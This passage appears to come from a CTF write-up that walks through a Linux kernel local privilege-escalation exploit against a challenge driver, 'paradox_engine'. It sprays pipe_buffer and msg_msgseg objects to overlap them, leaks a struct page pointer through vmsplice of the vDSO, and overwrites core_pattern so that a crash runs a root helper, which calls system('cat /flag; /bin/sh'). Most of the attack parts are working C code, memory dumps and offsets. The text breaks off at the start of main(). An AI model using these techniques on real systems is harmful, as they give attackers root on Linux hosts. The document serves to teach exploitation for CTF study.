Half of the pre- and post-alloc objects are in fd1, while half are in fd5. The self-referring object uses fd2.

:exclamation: The key difference is: I first close fd5 to free half the pre- and post- alloc objects in CPU 0, to get the victim slab in CPU 0's partial list

With this, after the cross-cache attack my victim page was in the free area and could be reclaimed by CPU 0!

### Part 2. Spraying pipe\_buffer to reclaim victim page

When we inspect the victim page, this is what we will see:

```
...
0xffff888006494bd0|+0x0bd0|+378: 0x0000000000000001 <- victim event id
0xffff888006494bd8|+0x0bd8|+379: 0x00000000bfffffff <- victim refcount
0xffff888006494be0|+0x0be0|+380: 0xffff888006494bd0 <- victim's dependency (itself)
0xffff888006494be8|+0x0be8|+381: 0x6665722d666c6573 'self-referring event'
0xffff888006494bf0|+0x0bf0|+382: 0x6520676e69727265 'erring event'
0xffff888006494bf8|+0x0bf8|+383: 0x00000000746e6576 ('vent'?)
0xffff888006494c00|+0x0c00|+384: 0x0000000000000000
0xffff888006494c08|+0x0c08|+385: 0xa36fb47ca526c672 <- mangled freelist pointer
0xffff888006494c10|+0x0c10|+386: 0x0000000000000000
0xffff888006494c18|+0x0c18|+387: 0x0000000000000000
0xffff888006494c20|+0x0c20|+388: 0x0000000000000000
0xffff888006494c28|+0x0c28|+389: 0xdead000000000100
0xffff888006494c30|+0x0c30|+390: 0xdead000000000122
0xffff888006494c38|+0x0c38|+391: 0xffff8880060d9900 <- parent timeline
0xffff888006494c40|+0x0c40|+392: 0x000000000000089d <- start of next temporal_event
0xffff888006494c48|+0x0c48|+393: 0x0000000000000000
0xffff888006494c50|+0x0c50|+394: 0x0000000000000000
0xffff888006494c58|+0x0c58|+395: 0x6c6c612d74736f70 'post-alloc object'
0xffff888006494c60|+0x0c60|+396: 0x63656a626f20636f 'oc object'
0xffff888006494c68|+0x0c68|+397: 0x0000000000000074
0xffff888006494c70|+0x0c70|+398: 0x0000000000000000
0xffff888006494c78|+0x0c78|+399: 0xd36fb47ca526cd22
0xffff888006494c80|+0x0c80|+400: 0x0000000000000000
0xffff888006494c88|+0x0c88|+401: 0x0000000000000000
0xffff888006494c90|+0x0c90|+402: 0x0000000000000000
0xffff888006494c98|+0x0c98|+403: 0xdead000000000100
0xffff888006494ca0|+0x0ca0|+404: 0xdead000000000122
0xffff888006494ca8|+0x0ca8|+405: 0xffff8880060d9980  ->  0x0000000000000000
...
```

For reference here's the `temporal_event` struct:

```c
struct temporal_event {
	u64 event_id; // +0x0
	refcount_t causal_weight; // +0x8
	struct temporal_event *causal_dependency; // +0x10
	char description[64]; // +0x18
	struct list_head timeline_node; // +0x58
	struct timeline *parent_timeline; // +0x68
};
```

Notice that the victim object is from `0xffff888006494bd0 - 0xffff888006494c3f` while the post-alloc object is from `0xffff888006494c40 - 0xffff888006494caf`

Furthermore, note that the victim's refcount is at `0xbfffffff` meaning it has underflowed, and its `causal_dependency` pointer is pointing to itself at `0xffff888006494bd0` .

:writing\_hand: Another important note is that all the objects are spaced `0x70 = 112` bytes apart. This is a highly abnormal size which was made possible by the use of the dedicated slab cache. In practice, it is very difficult for us to find exploitable kernel objects of this exact size. Ideally we would want the object to have the same size as other objects in the kmalloc- or kmalloc-cg- caches.&#x20;

:warning: If we tried to reclaim the page by spraying objects of a different size, and accidentally overwrite the `causal_dependency` pointer with an invalid non-null value, when the `paradox_engine_release` dereferences the pointer in the loop, the kernel would crash!

:brain: If we just overwrite `causal_dependency` with NULL, the loop simply terminates, and we don't use the infinite loop to kfree anything else. We basically "waste" the vulnerability.

:eyes: Ideally, we want to reclaim it with something that we can control so that we can control what we kfree next! If we overwrite the refcount to 1, and overwrite `causal_dependency` to something that can be kfreed, we will have a double allocation! But the problem with this is that we don't have any leaks :cry:, so we don't know what to overwrite it with either!

#### :bulb: The eureka moment&#x20;

I spent quite a few days spraying different objects to find out what could be a possible solution. As I was playing with `pipe_buffer`, I realised that very often the `page` storing the buffer's data would reclaim the victim page, and the data I write into the pipe would overwrite the bytes in the victim page. When we write into this page, we can overwrite the `causal_weight` refcount, followed by the `temporal_event *` .

This got me wondering: Is it possible that writing into this pipe could allow partial overwrites? What if instead of overwriting all 8 bytes of the `temporal_event *` I could just overwrite 1, or 2, or 3? :thinking:

It turns out, you can!&#x20;

Now let's think about what we can do with this in mind:

* Spray `pipe_buffer` , one of their pages will reclaim the victim page
* Since the refcount is always +0x8-bytes aligned, first write 0x10 bytes into each pipe. Then read those 0x10 bytes to see if the last 8 bytes had changed, for example from `\x00\x00\x00\x00\x00\x00\x00\x01` to `\x00\x00\x00\x00\xc0\x00\x00\x00` or to `\x00\x00\x00\x00\xbf\xff\xff\xff` . If they did change, then we know that the victim object is at offset +0x000 within the victim page, and we will also know which pipe holds the victim page.
  * Otherwise if the victim object is not at offset +0x000, we repeat the previous step, but this time writing 0x20 bytes and reading 0x20 bytes. We repeat this until we find the offset of the victim object within the victim page, and we know which pipe holds the victim page.

In doing these, we have found the pipe holding the victim page and the offset of the victim object within the victim page, and we also haven't touched the `temporal_event *` pointer. That's great!&#x20;

:question: Now the question is: What do we do with our partial overwrite primitive on the `temporal_event *`? To answer this question, I took a quick look at the pages in the page allocator using the `buddy-dump` command to see if there was anything useful. Note that at this point, my `temporal_event *` was `0xffff888006494bd0`.

I saw this:

<figure><img src="https://243380073-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FBIa0PcXGYuP6chd3J1Ry%2Fuploads%2FqSIcX57LG7Umx7Q1OE7B%2Fimage.png?alt=media&#x26;token=c8db334e-b1f8-4a14-9176-2198d9505569" alt=""><figcaption></figcaption></figure>

<details>

<summary>What is "order"?</summary>

The buddy allocator maintains blocks of free pages where each block is a power-of-two number of pages. The exponent of the power-of-two block size is referred to as the *order*. If your order is 3, for example, the block has $$2^3$$ pages.

View this [page](https://www.kernel.org/doc/gorman/html/understand/understand009.html) for more info.

</details>

This is great for two reasons:

1. If I overwrite the least significant 3 bytes of `temporal_event *` to `\x60\x00\x00` I would be able to get this exact address
2. This pattern is consistent across reboots! Let's see another run:

Self-referring event at `0xffff88800654ea80`, order 9 unmovable page at `0xffff888006600000` :

<figure><img src="https://243380073-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FBIa0PcXGYuP6chd3J1Ry%2Fuploads%2FTNHPBZCDyjviYBfzjWYA%2Fimage.png?alt=media&#x26;token=5e1bceb0-bd97-4838-893a-022f5de4179e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://243380073-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FBIa0PcXGYuP6chd3J1Ry%2Fuploads%2FR1q5peSuSIQqFVZ6H81v%2Fimage.png?alt=media&#x26;token=9c0e4c0d-f70b-4d4e-8719-32f9df11c4bc" alt=""><figcaption></figcaption></figure>

:thumbsup: So if we do something like this:

* Spray an object X to reclaim the order-9 page
* Partial overwrite `temporal_event *` to trigger kfree on its address
* Spray another object Y to reclaim the page again,

We could achieve an overlap between objects X and Y! Wonderful!

### Part 3. Spraying enlarged pipe\_buffers to claim the order-9 page

Now I was once again on the hunt for a new object. It had to be relatively large so that I could get it to use the order-9 page within a reasonable time, and also

:warning: Ideally at offset `+0x10` it should have NULL. Why? Look at `temporal_event` and the infinite loop again:

```c
struct temporal_event {
	u64 event_id; // +0x0
	refcount_t causal_weight; // +0x8
	struct temporal_event *causal_dependency; // +0x10
	char description[64]; // +0x18
	struct list_head timeline_node; // +0x58
	struct timeline *parent_timeline; // +0x68
};
// Drop one reference on an event; when the atomic refcount reaches zero the
// event is kfree()d via event_erase_from_reality. NULL-safe.
static void event_put(struct temporal_event *event) { 
    if (event && refcount_dec_and_test(&event->causal_weight)) 
        event_erase_from_reality(event); 
}
// Final teardown: simply kfree()s the event (the diagnostic printk is
// commented out in the challenge source).
static void event_erase_from_reality(struct temporal_event *event) {
	//	printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
	kfree(event);
}
// paradox_engine_release snippet
while (cause) {
	struct temporal_event *next_in_chain = cause->causal_dependency;
	event_put(cause);
	cause = next_in_chain;
}
```

In the first round of the loop, after we set refcount = 1 and do the partial overwrite, `next_in_chain` would be our page address. This then becomes `cause`.

In the second round of the loop, `next_in_chain` would be whatever is at `page+0x10` .

If `page+0x10` is not null, the third round of the loop would do `cause->causal_dependency` (which is actually `(*cause).causal_dependency` ) and dereference the value at `page+0x10` .

We also have a third requirement: Whatever is at offset +0x8 of the page overlaps with what the program thinks is the `temporal_event`'s refcount, so we should be able to set this to one if we actually want the reclaiming object to get freed using `event_put`.

:scroll: To summarise what we need of object X:

* Relatively large
* Value at +0x10 is (hopefully) null
* Value at +0x8 == 1

I was once again stuck at this point for several days. And then I saw the light. How? By again playing with `pipe_buffer`. Let's look closely at this bad boy, shall we?

:exclamation:Note that `pipe_buffer` structs don't exist in isolation; rather, they are allocated as a consecutive array of pipe buffers. In fact, there is another struct called `pipe_inode_info` which points to a **ring** of `pipe_buffer`s via its `pipe_inode_info.bufs` field.&#x20;

:green\_circle: `pipe_buffer` actually satisfies the "relatively large" requirement since we can enlarge the array via the function `fcntl(pipe_fd, F_SETPIPE_SZ, PAGE_SIZE * n)` which changes the pipe ring size. (Here n should be a power of 2 according to [this](https://www.interruptlabs.co.uk/articles/pipe-buffer)).

:green\_circle: `pipe_buffer` also satisfies the third requirement since we can control the value of `pipe_buffer->offset` by reading from it.

```c
/* Layout of struct pipe_buffer on x86-64 (field offsets in comments). */
struct pipe_buffer {
  struct page *page;                      /* +0x00: backing page */
  unsigned int offset;                    /* +0x08: data offset in page */
  unsigned int len;                       /* +0x0c: bytes of data */
  const struct pipe_buf_operations *ops;  /* +0x10: nulled on release */
  unsigned int flags;                     /* +0x18 */
  unsigned long private;                  /* +0x20 */
};  // size of a pipe_buffer is 0x28
```

At first glance, it seems useless as it literally has a pointer at offset +0x10. If we simply create a `pipe_buffer` object in our page then trigger the vulnerability, we would get cooked as \*ops gets dereferenced and we get a crash somewhere down the line.

:angel: But here's our saving grace: When a `pipe_buffer` gets released, its `ops` field actually gets nulled! This is fantastic for us, since we can simply allocate then release the first `pipe_buffer` in the ring to null out whatever is at offset +0x10! We are still free to use the rest of the `pipe_buffers` in the page for exploitation.

There's a catch, however: a non-privileged user has a limit to the max `pipe_buffer` size they can allocate, and this can be checked in `/proc/sys/fs/pipe-max-size`:

```
~ $ cat /proc/sys/fs/pipe-max-size
1048576 = 0x1000 * 0x100
```

After spraying a bit (and praying), I found that spraying just 50 of these max-sized pipes was sufficient to consistently claim the order-9 page.

So for this step, basically just spray 50 of these max-sized pipes, and write and read 1 byte from each of them to trigger their release, which will NULL out the `ops` pointer. Simultaneously, writing and reading 1 byte from it causes `pipe_buffer->offset = 1` which allows the page to be freed when `event_put` is called on the page!

Here's the code for this part:&#x20;

```c
#define PIPE_BUF_SPRAY1 50

int pfds[PIPE_BUF_SPRAY1][2];
char* filler1 = malloc(0x1000);
memset(filler1, 'A', 0x1000);
int res;
// stage 1: reclaiming the order-9 free block (see Part 2) using enlarged pipe_buffer structs
for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
    res = pipe(pfds[i]);
    if (res < 0) {
        printf("Failed to allocate pipe buffers\n" );
        return -1;
    }
    // enlarge the ring to the unprivileged max (/proc/sys/fs/pipe-max-size)
    // we can spray at most around 60 of these before we get cooked
    res = fcntl(pfds[i][1], F_SETPIPE_SZ, 0x1000 * 0x100);
    if (res < 0) {
        printf("fcntl %d failed!\n", i );
        return -1;
    }
    // write into bufs[0] so the first pipe_buffer gets a page and ops set
    res = write(pfds[i][1], filler1, 1);
    if (res < 0) {
        printf("write failed!\n" );
        return -1;
    }
}
for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
    // drain the byte: releasing bufs[0] NULLs its ops field (offset +0x10)
    // at the same time, set its pipe_buffer->offset = temporal_event->refcount = 1 :)
    read(pfds[i][0], filler1, 1);
}
```

### Part 4. Trigger vuln

As discussed previously, overwrite the victim object, setting its refcount to 1 and overwriting the least significant 3 bytes to `\x60\x00\x00`. This *should* cause the page claimed in the previous step to now be freed!

To do so, free the victim pipe whose id we now know, and spray `pipe_buffer` again.

The issue here was that freeing this victim pipe sometimes caused the page to go into CPU 1's partial list, which I did not have control of. This could have been due to some balancing of cpu partial lists. To deal with this issue, I create some dummy `pipe_buffers` by calling `pipe` then writing into each pipe, and closed them before closing the victim pipe.

:exclamation: This reclamation is only successful slightly less than 50% of the time, and it's where my exploit loses the bulk of its consistency.

Code:

```c
// need to spray enough to push the victim pipe into free_area instead of cpu1 ?
int dummy_pipes[DUMMY_PIPES][2];
for (int i = 0; i < DUMMY_PIPES; i++) {
    int res = pipe(dummy_pipes[i]);
    if (res < 0) {
        printf("Failed to create pipe %d\n", i);
        break;
    }
}
for (int i = 0; i < DUMMY_PIPES; i++) {
    res = write(dummy_pipes[i][1], "a", 1);
    if (res < 0) {
        printf("Failed to write to pipe %d\n", i);
        break;
    }
    close(dummy_pipes[i][1]);
    close(dummy_pipes[i][0]);
}
close(pipe_fds[changed_pipe][1]);
close(pipe_fds[changed_pipe][0]);
usleep(1000);
// getchar();
char* buf = malloc(cursize + 3);
memset(buf, '\x00', cursize + 3);
buf[cursize - 0x8] = '\x01'; // refcount
// buf[cursize + 2] = '\xa0';
buf[cursize + 2] = '\x60';
// spray more pipe_buffer for the partial overwrite
int stage_2_pipes[PIPE_BUF_SPRAY2][2];
for (int i = 0; i < PIPE_BUF_SPRAY2; i++) {
    // printf("i: %d\n", i);
    int res = pipe(stage_2_pipes[i]);
    if (res < 0) {
        printf("Failed to allocate pipe buffers %d\n", i);
        break;
    } 
    ret = write(stage_2_pipes[i][1], buf, cursize + 3);
    if (ret < 0) {
        printf("[x] Write!\n");
        break;
    }
}
```

### Part 5. Overlapping objects X and Y

Now we need to choose an object Y which will overlap with our array of `pipe_buffers` . Note that as the vuln triggers a kfree in CPU 1 (as our infinite loop occurred in CPU 1), this part has to be done in CPU 1. I achieved this by creating a thread and pinning it to CPU 1.&#x20;

Note that our object here should claim a page of order $$\leq$$ 2 because the re-released page is of order 2:

<figure><img src="https://243380073-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FBIa0PcXGYuP6chd3J1Ry%2Fuploads%2FZoLl9wMA264VUEdcvOMp%2Fimage.png?alt=media&#x26;token=529a6ddf-a6af-48e5-b926-12c7881e7516" alt=""><figcaption></figcaption></figure>

The ideal candidate here, of course, would be `msg_msgseg` since we pretty much get arbitrary read + write over the entire struct, and we can modify its size by controlling the size of the data we send using `msgsnd`. As we can freely modify its size, we can also control the order of the page it reclaims.

<details>

<summary>Background on System V IPC</summary>

Function Signatures:

```c
int msgget(key_t key, int msgflg);
ssize_t msgrcv(size_t msgsz;
                      int msqid, void msgp[msgsz], size_t msgsz, long msgtyp,
                      int msgflg);
int msgsnd(size_t msgsz;
                      int msqid, const void msgp[msgsz], size_t msgsz,
                      int msgflg);
```

Sending messages via System V IPC first needs you to create a message queue as follows:

```c
int qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
```

Then using the queue id, you can send a message as such:

```c
struct msgbuf {
            long mtype;
            char mtext[0x1000-0x30-0x8+0x400];
};
msgbuf* msg = malloc(sizeof(msgbuf));
msg->mtype = 6;
int ret = msgsnd(qid, msg, sizeof(msg->mtext), 0);
if (ret < 0) {
            printf("i: %d[x] msgsnd!\n", i);
            return -1;
}
```

and receive them as such:

```c
msgrcv(msqid, leakmsg, 0x1000-0x30-0x8+0x400, 0, IPC_NOWAIT | MSG_COPY);
```

Note: In `msgrcv`, you can specify `IPC_NOWAIT | MSG_COPY` if you don't want the underlying `msg_msg` or `msg_msgseg` structs to be freed when the message is received

Note: Specifying the message's `mtype` when sending and receiving messages allows you to specify which message you want. If your `msgrcv` mtype is 0, you just get the first message in the queue.

</details>

<details>

<summary>What is msg_msgseg?</summary>

First, understand that the size of a msg\_msg struct is 0x30, and the rest of the struct is the transmitted data. If the data sent exceeds (0x1000 - 0x30) = 0xfd0 bytes, the remaining data is transmitted in a msg\_msgseg struct. msg\_msgseg struct has an 8-byte pointer, and user data comes after.

</details>

```c
/* Kernel doubly-linked list head (reproduced here so offsets are self-evident). */
struct list_head {
	struct list_head *next, *prev;
};

/* System V IPC message header (0x30 bytes); the message text follows inline. */
struct msg_msg {
	struct list_head m_list;   /* +0x00: queue linkage */
	long m_type;               /* +0x10: user-chosen mtype */
	size_t m_ts;               /* +0x18: total message text size */
	struct msg_msgseg *next;   /* +0x20: first continuation segment */
	void *security;            /* +0x28: LSM blob */
	/* the actual message follows immediately */
};

/* Continuation segment, used when the text exceeds 0x1000 - 0x30 bytes. */
struct msg_msgseg {
	struct msg_msgseg *next;
	/* content afterwards */
};
```

I went ahead with a 0x400-sized `msg_msgseg` spray, and my `msg_msgseg` goes into `kmalloc-cg-1k`. When we do `slub-dump kmalloc-cg-1k` in gef, we can clearly see that the page order is 2, because num pages: 4. Therefore it is a good size to choose to maximise the chance of `msg_msgseg` reclaiming the page!

<figure><img src="https://243380073-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FBIa0PcXGYuP6chd3J1Ry%2Fuploads%2Fmq4rlTLE8SX8bH50caEg%2Fimage.png?alt=media&#x26;token=8f9d64ea-8a0f-4f28-9770-3595109a71ea" alt="" width="375"><figcaption></figcaption></figure>

Here's my code for this segment:

```c
#define NUM_MSGMSG 250
int ms_qids[NUM_MSGMSG];

/*
 * Thread body (pinned to CPU 1): spray 0x400-byte msg_msgseg allocations into
 * kmalloc-cg-1k so one of the freshly-grabbed order-2 slab pages reclaims the
 * page kfree()d by the vulnerability. Each msgsnd() of
 * (0x1000 - 0x30 - 0x8 + 0x400) bytes yields one page-sized msg_msg plus one
 * msg_msgseg in kmalloc-cg-1k.
 *
 * Returns NULL; failures are reported on stdout. (The original returned the
 * integer -1 from a void* function and fell off the end — both UB.)
 */
void *spray_msg_msg_seg(void *arg)
{
    (void)arg;
    // want to reclaim an order 2 page now
    // target kmalloc-cg-1k
    pin_this_thread_to_cpu(1);

    for (int i = 0; i < NUM_MSGMSG; i++) {
        ms_qids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
        if (ms_qids[i] < 0)
            printf("[x] msgget %d!\n", i);
    }
    // honestly here just pray we reclaim with msg_msgseg and not msg_msg
    // can at most send 0x2000:
    // ~ $ cat /proc/sys/kernel/msgmax
    // 8192
    struct msgbuf {
        long mtype;
        char mtext[0x1000 - 0x30 - 0x8 + 0x400];
    };

    struct msgbuf *msg = malloc(sizeof *msg);
    if (!msg) {
        printf("[x] malloc!\n");
        return NULL;
    }
    msg->mtype = 6;
    memset(msg->mtext, 'a', sizeof(msg->mtext));

    for (int i = 0; i < NUM_MSGMSG; i++) {
        if (msgsnd(ms_qids[i], msg, sizeof(msg->mtext), 0) < 0) {
            printf("i: %d[x] msgsnd!\n", i);
            break;
        }
    }
    free(msg);
    return NULL;
}
int main(){ 
...
    pthread_t t3;
    pthread_create(&t3, NULL, spray_msg_msg_seg, NULL);
    pthread_join(t3, NULL);
...
}

```

### Part 6. vmsplice syscall

Now that we have overlapping `msg_msgseg` and `pipe_buffer` structs, we need to think of how to get LPE.&#x20;

:x: One option was getting a text leak from `pipe_buffer->ops` , then replacing it with a stack pivot gadget and doing kROP. But this won't work since SMAP and SMEP are enabled.

After some research, I came across [this exploit](https://github.com/google/security-research/blob/c6bbc1e706152250c3e412d2c7b9257788665fa1/pocs/linux/kernelctf/CVE-2024-26808_cos/docs/exploit.md?plain=1#L401) which had a similar `msg_msgseg` and `pipe_buffer` overlap.&#x20;

<details>

<summary>What is vdso?</summary>

Wikipedia: vDSO (virtual dynamic shared object) is a kernel mechanism for exporting a carefully selected set of [kernel space](https://en.wikipedia.org/wiki/Kernel_space) routines to [user space](https://en.wikipedia.org/wiki/User_space) applications so that applications can call these kernel space routines in-process, without incurring the performance penalty of a [mode switch](https://en.wikipedia.org/wiki/Mode_switch_\(computing\)) from [user mode](https://en.wikipedia.org/wiki/User_mode) to [kernel mode](https://en.wikipedia.org/wiki/Kernel_mode) that is inherent when calling these same kernel space routines by means of the [system call](https://en.wikipedia.org/wiki/System_call) interface.

While vDSO is provided by the kernel, it resides within the user-space portion of a process's virtual address space.

</details>

By doing something like this:

```c
// Evaluate a syscall expression exactly once; if it returned -1, err() out
// (printing errno plus the stringified call), otherwise yield the result.
// Uses a GCC/Clang statement expression, so it works in expression position.
#define SYSCHK(x)                     \
	({                                \
		typeof(x) __res = (x);        \
		if (__res == (typeof(x))-1)   \
			err(1, "SYSCHK(" #x ")"); \
		__res;                        \
	})
// get vDSO addr
// https://man7.org/linux/man-pages/man3/getauxval.3.html
size_t *vvar = ((size_t *)getauxval(AT_SYSINFO_EHDR));
struct iovec iov = {vvar, 1};
// vmsplice vDSO to the pipe, it will spill struct page of kernel text to the pipe
SYSCHK(vmsplice(mypipe[1], &iov, 1, 0));
```

We cause `pipe_buffer->page` to refer to the page struct corresponding to vDSO. That is, a page responsible for kernel text.

<details>

<summary><span data-gb-custom-inline data-tag="emoji" data-code="1f914">🤔</span> Why is this helpful? </summary>

With a leaked page\* pointer from the pipe\_buffer, we can change it to be the page responsible for any region of kernel text! We'll see why this is useful later.

</details>

### Part 7. Leaking page\* of kernel text

To recap what we've done, we:

1. Sprayed `msg_msgseg` into the first 0x400 bytes of the page to reclaim the order 2 page
2. Overwrote some of  the `msg_msgseg` (to be specific the second chunk of 0x28 bytes) using the spliced pipe\_buffer, whose `page *` is responsible for vDSO

Now if we read from `msg_msgseg` we can get the `page *` leak! (Note: the `ops *` leak isn't really necessary)

```c
int victim_msqid = -1;

struct leakmsgbuf *leakmsg = malloc(sizeof(struct leakmsgbuf));
leakmsg->mtype = 6;
memset(leakmsg, 0, sizeof(struct leakmsgbuf));
char* correct_buf = malloc(0x1000-0x30-0x8+0x400);
memset(correct_buf, 'a', 0x1000-0x30-0x8+0x400);
struct pipe_buffer *p;
for (int i = 0; i < NUM_MSGMSG; i++) {
    // read msg without freeing memory
    ret = msgrcv(ms_qids[i], leakmsg, 0x1000-0x30-0x8+0x400, 0, IPC_NOWAIT | MSG_COPY);
    if (ret < 0) {
        perror("msgrcv"); 
        continue;
    }
    if (memcmp(leakmsg->mtext, correct_buf, 0x1000-0x30-0x8+0x400) != 0) {
        msgrcv(ms_qids[i], leakmsg, 0x1000-0x30-0x8+0x400, 6, 0);
        victim_msqid = ms_qids[i];
        printf("[+] Victim found! msqid: %d\n", victim_msqid);
        // print victim data
        for (int i = 0x1000-0x30-0x8+0x28; i < 0x1000-0x30-0x8+0x40; i++) {
            printf("%02x ", leakmsg->mtext[i]);
        }
        printf("\n");
        p = (void *)&leakmsg->mtext[0x1000 - 0x30 - 0x8 + 0x28];
        break;
    }
}
/*
no kaslr leaks : 
- page leak: 0xffffea00000cf400
- pipe_buf_ops leak: 0xffffffff82c6fe80

kernel text:   0xffffffff81000000-0xffffffff82800000 (0x1800000 bytes)
kernel rodata: 0xffffffff82800000-0xffffffff83497000 (0xc97000 bytes)
kernel data:   0xffffffff83600000-0xffffffff8419d000 (0xb9d000 bytes)

    struct pipe_buffer {
        void *page;
        unsigned int offset, len;
        void *ops;
        unsigned int flags;
        unsigned long private;
    };
*/
if (victim_msqid == -1) {
    printf("Victim msqid not found!\n");
    return -1;
}
void *page_leak;
memcpy(&page_leak, (leakmsg->mtext) + 0x1000 - 0x30 - 0x8 + 0x28, sizeof(void *));
void *pipe_buf_ops_leak;
memcpy(&pipe_buf_ops_leak, (leakmsg->mtext) + 0x1000 - 0x30 - 0x8 + 0x38, sizeof(void *));
printf("page leak: %p\n", page_leak);
printf("pipe_buf_ops leak: %p\n", pipe_buf_ops_leak);
```

### Part 8 + 9. Overwriting the second pipe

Now what can we do with the `page *` leak? Well, there happens to be a buffer in kernel memory (in the kernel data region, despite often being loosely called "kernel text") named `core_pattern`, which basically tells the kernel what to do when there's a crash.&#x20;

In the linux kernel documentation [/usr/src/linux/Documentation/sysctl/kernel.txt](https://www.kernel.org/doc/Documentation/sysctl/kernel.txt).

> \[/proc/sys/kernel/]core\_pattern is used to specify a core dumpfile pattern name.
>
> * If the first character of the pattern is a '|', the kernel will treat the rest of the pattern as a command to run. The core dump will be written to the standard input of that program instead of to a file.

In other words, if we overwrite core\_pattern with something starting with '|', whatever comes after is treated as a command that the kernel will run — as a root user-mode helper process — whenever a process crashes!

But the question now is: Sure, we know the address of the `page *` pointing to vDSO, but how do we know the address of the `page *` responsible for `core_pattern`? It turns out that the offset between them is constant. By calculating the offset between the `vDSO` and `core_pattern` virtual addresses we can also calculate the offset between their respective `page *` structs!

In my case, I found:

```c
// p->page was originally pointing vdso_image_64.data.
// gef> p (void*)vdso_image_64
// $2 = (void *) 0xffffffff833d0000 <- vdso_image_64.data
// gef> p &core_pattern
// $1 = (<data variable, no debug info> *) 0xffffffff83808a60
// gef> p 0xffffffff83808a60-0xffffffff833d0000
// $3 = 0x438a60
```

The difference between the address of the pages of vdso\_image\_64.data and core\_pattern is 0x438000. For every 0x1000-byte page there is a 64-byte `struct page` stored in vmemmap, so to convert this byte offset into an offset between `struct page *` addresses you compute 0x438000 / 4096 \* 64, which equals 0x438000 >> 6 = 0x10e00.

Looking at the pre-overwritten `pipe_buffer`:

```c
/* struct pipe_buffer layout on x86-64 (field offsets in comments). */
struct pipe_buffer {
  struct page *page;                      /* +0x00 */
  unsigned int offset;                    /* +0x08 */
  unsigned int len;                       /* +0x0c */
  const struct pipe_buf_operations *ops;  /* +0x10 */
  unsigned int flags;                     /* +0x18 */
  unsigned long private;                  /* +0x20 */
};  
  
  0xffff888006600000|+0x0000|+000: 0x0000000000000000 <- start of bufs[0] pipe_buffer
  0xffff888006600008|+0x0008|+001: 0x6161616161616161 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
  0xffff888006600010|+0x0010|+002: 0x6161616161616161 'aaaaaaaaaaaaaaaaaaaaaaaa'
  0xffff888006600018|+0x0018|+003: 0x6161616161616161 'aaaaaaaaaaaaaaaa'
  0xffff888006600020|+0x0020|+004: 0x6161616161616161 'aaaaaaaa'
  0xffff888006600028|+0x0028|+005: 0xffffea00000cf400  ->  0x008c000000002204 <- start of bufs[1] pipe_buffer and the page leak!
  0xffff888006600030|+0x0030|+006: 0x0000000100000000
  0xffff888006600038|+0x0038|+007: 0xffffffff82c6fe80 <user_page_pipe_buf_ops>  ->  0x0000000000000000
  0xffff888006600040|+0x0040|+008: 0x0000000000000000
  0xffff888006600048|+0x0048|+009: 0x0000000000000000
  0xffff888006600050|+0x0050|+010: 0x6161616161616161
```

the `len = 1` already. By leaving the `len` untouched and setting `pipe_buffer->offset = 0xa60 - 1` we can change the entire content of `core_pattern`! We also need to add the `PIPE_BUF_FLAG_CAN_MERGE` flag to `pipe_buffer->flags` to allow every pipe write to also write to the physical page.

Here's the code for this part:

```c
// modify struct page that will represent of `core_pattern`'s page
// p->page was originally pointing vdso_image_64.data.
// gef> p (void*)vdso_image_64
// $2 = (void *) 0xffffffff833d0000 <- vdso_image_64.data
// gef> p &core_pattern
// $1 = (<data variable, no debug info> *) 0xffffffff83808a60
// gef> p 0xffffffff83808a60-0xffffffff833d0000
// $3 = 0x438a60
// the difference between the address of the pages of vdso_image_64.data and core_pattern is 0x438000
// every 4096 byte page, there is a 64 byte struct page* stored in vmemmap, 
// so to calculate the difference between struct page* addresses, you have to do: 0x438000 / 4096 * 64 which equals 0x438000 >> 6 = 0x10e00
// (right shift by 12 bits and left shift by 6 bits)
p->page += (0x438000 >> 6);
// Since p->len == 1, we need to subtract one on p->offset
p->offset = 0xa60 - 1;
p->flags = 0x10; // PIPE_BUF_FLAG_CAN_MERGE, apply every pipe write to the page
leakmsg->mtype = 7;
// overwrite the pipe_buffer with msg_msgseg (with our own modified pipe_buffer content)
int payload_msqids[0x100];
for (int i = 0; i < 0x100; i++) {
    payload_msqids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}
for (int i = 0; i < 0x100; i++) {
    ret = msgsnd(payload_msqids[i], leakmsg, 0x1000-0x30-0x8+0x400, 0);
    if (ret < 0) {
        printf("[x] msgsnd %d!\n", i);
        return -1;
    }
}
```

### Part 10. Setting up the command + executing it for root shell

We still need to decide what to write into the `core_pattern` which will give us LPE when a crash is triggered. I used the same method as [this exploit](https://github.com/google/security-research/blob/c6bbc1e706152250c3e412d2c7b9257788665fa1/pocs/linux/kernelctf/CVE-2024-26808_cos/docs/exploit.md?plain=1#L401), which was to overwrite it with `|/proc/%P/fd/666 %P\n`. Doing so causes the kernel to execute whatever process is on the crashing process' FD 666, passing the PID as an argument.

Then consider the following `main`:&#x20;

```c
int cfd[2];
char* dummybuf = "abcd";

/*
 * Root payload. Invoked (as root) by the kernel's core-dump helper through
 * the overwritten core_pattern ("|/proc/%P/fd/666 %P"); buf holds the
 * crashing child's PID in decimal. Steals the child's stdio descriptors via
 * pidfd so the shell is attached to the original console, then prints the
 * flag and drops to a shell. (The original also built an unused
 * "/proc/PID/ns/net" path string — dead code, removed.)
 */
void root(char *buf)
{
	int pid = strtoull(buf, 0, 10);
	// fix stdin, stdout, stderr: duplicate the crashing process's fds 0-2
	int pfd = syscall(SYS_pidfd_open, pid, 0);
	int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
	int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
	int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
	dup2(stdinfd, 0);
	dup2(stdoutfd, 1);
	dup2(stderrfd, 2);
	// just cat the flag
	system("cat /flag; /bin/sh");
}

int main(int argc, char **argv) {
